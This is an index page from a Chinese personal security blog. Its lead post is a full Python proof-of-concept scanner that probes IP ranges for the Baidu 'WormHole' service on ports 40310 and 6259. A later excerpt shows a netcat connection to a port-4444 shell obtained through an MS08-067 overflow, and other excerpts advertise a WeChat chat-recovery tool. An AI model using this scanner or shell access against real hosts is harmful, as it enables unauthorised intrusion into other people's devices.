BlackFeather'S Blog我的技术小博 -- C/C++,Python,Golang

WormHole的检测代码，随手python写的。

#exploit write by fenlog,baidu wormhole POC.
#QQ:345382462

import urllib2, urllib
import sys



headers = {
  "Accept": "*/*",
  "Host": "127.0.0.1",
  "remote-addr": "127.0.0.1",
  "Referer": "http://www.baidu.com/"
}

def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0]<<24 | ip[1]<<16 | ip[2]<<8 | ip[3]

def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)

def URLRequest(url):
	try:
		request = urllib2.Request(url = url,headers = headers)
		response = urllib2.urlopen(request)
		return response.read()
	except:
		return ""


if len(sys.argv) == 3:
	ipstart = ip2num(sys.argv[1])
	ipend = ip2num(sys.argv[2])
elif (len(sys.argv) == 2):
	ipstart = ip2num(sys.argv[1])
	ipend = ipstart
else:
	print "Baidu WarmHole POC by www.fenlog.com\nUsage1: %s TargetIP \nUsage2: %s StartIP EndIP" % (sys.argv[0], sys.argv[0])
	exit(0)



if (ipstart > ipend):
	print "Target IP Err"
	exit(0)

urllib2.socket.setdefaulttimeout(3)
	
for targetip in range(ipstart, ipend + 1):
	strip = num2ip(targetip)
	print "Scan %s..." % (strip)
	url1 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 40310)
	url2 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 6259)
	ret = URLRequest(url1)
	if (len(ret) == 0):
		ret = URLRequest(url2)

	if (len(ret) > 0):
		print "Found %s:%s" % (strip, ret)

print "Scan %d IPs Finish!" % (ipend - ipstart + 1)

More...

微信聊天记录备份恢复助手正式发布！

微信聊天记录恢复助手 软件下载地址： http://www.fenloger.com/   同时支持安卓和苹果设备哦！~

 ///////////////////////////////////////// /////////////////////////////////////////

这里就说明一下最常用的简单可行的通用方法，对于一些特殊机型或者特殊方法就不提了。

大概的讲两个方法吧，一个是所有安卓手机通用的方法，另一个是安卓4.0及以上版本的方法。

1.安卓4.0及以上版本手机导出方法

查看安卓系统版本请依次点击“程序--设定--关于设备（菜单最下面）”，里面有Android版本选项。如果不是4.x.x，请跳过这个方法直接看下面的通用方法。

...

More...

微信聊天记录备份恢复助手正式发布！

微信聊天记录恢复助手 软件下载地址： http://www.fenloger.com/  同时支持安卓和苹果设备哦！~

 ///////////////////////////////////////// /////////////////////////////////////////

1、注册

这个操作不多说了，用户名只能使用纯数字，其他的没有任何限制比如长度、密码格式什么的，建议大家用户名长一些，密码负责点，忘了密码请联系博主。十分抱歉没有做完善，原谅博主这个精力有限的男人

2.导出记录

...

More...

微信聊天记录备份恢复助手正式发布！

微信聊天记录恢复助手 软件下载地址： http://www.fenloger.com/   同时支持安卓和苹果设备哦！~

刚刚开通了群，欢迎各位加入参与互动讨论与问题反馈！！群号：330726869

 ///////////////////////////////////////// /////////////////////////////////////////

 ///////////////////////////////////////// /////////////////////////////////////////

以下为原WEB版本说明，逐步停止更新，请使用上述软件版本。

经过将近半个月的准备，花费了博主所有的空余时间和部分休息时间，现在终于可以出来见见人了。

安卓微信聊天记录解密查看恢复，平台链接：http://wx.fenlog.com      

...

More...

这几天MPEG-2视频0day漏洞闹得沸沸扬扬，最郁闷的是昨天晚上上网的时候我还中了这个，结果感染了猫癣病毒···不过好在我见多识广，第一反应不对劲立刻冷重启了，然后一一清除···所以我深深的体会到了0day的恐怖和没有打补丁的那种无助。于是乎从某挂了马的网站上分析出了网马，看了看代码，写了一个免疫器。在微软出补丁前，还是这么救济吧···

...

More...

这几天沸沸扬扬的MS08067漏洞，终于在不经意间发现了利用工具，晚上测试一不小心就成功了！有生以来第一次溢出成功，太他妈的激动了，大吼到嗓子哑了！！！！！

C:\Documents and Settings\Administrator>nc -vv 10.1.12.48 4444
PC-200810152207 [10.1.12.48] 4444 (?) open
...

More...